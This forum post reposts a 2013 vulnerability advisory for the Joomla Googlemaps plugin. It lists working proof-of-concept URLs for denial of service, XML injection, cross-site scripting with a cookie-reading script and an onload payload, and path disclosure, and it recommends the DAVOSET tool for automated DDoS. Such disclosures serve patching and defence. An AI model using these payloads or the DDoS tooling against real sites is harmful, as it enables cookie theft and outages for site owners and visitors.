Jump to content
thehat

Joomla Googlemaps Plugin XSS / XML Injection / Path Disclosure / DoS

Recommended Posts

These are Denial of Service, XML Injection, Cross-Site Scripting and Full

path disclosure vulnerabilities in Googlemaps plugin for Joomla.

-------------------------

Affected products:

-------------------------

Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and

potentially previous versions. In new version of DAVOSET I'll add a lot of

web sites with Googlemaps plugin.

-------------------------

Affected vendors:

-------------------------

Mike Reumer

Googlemaps Plugin - Joomla! Extensions Directory

----------

Details:

----------

Denial of Service (WASC-10):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file

Besides conducting DoS attack manually, it's also possible to conduct
automated DoS and DDoS attacks with using of DAVOSET
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).

XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml

It's possible to include external xml-files. Which also can be used for XSS
attack:

XSS via XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml

File xss.xml:

<?xml version="1.0" encoding="utf-8"?>
<feed>
<title>XSS</title>
<entry>
<div
xmlns="http://www.w3.org/1999/xhtml"><script>alert(document.cookie)</script></div>
</entry>
</feed>

Cross-Site Scripting (WASC-08):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/plugins/content/plugin_googlemap2_proxy.php

Besides plugin_googlemap2_proxy.php, also happens
plugin_googlemap3_proxy.php (but it has other path at web sites).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

# 3782C828C3E6E81E 1337day.com [2013-08-28] A70DB80C325E4592 #

Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...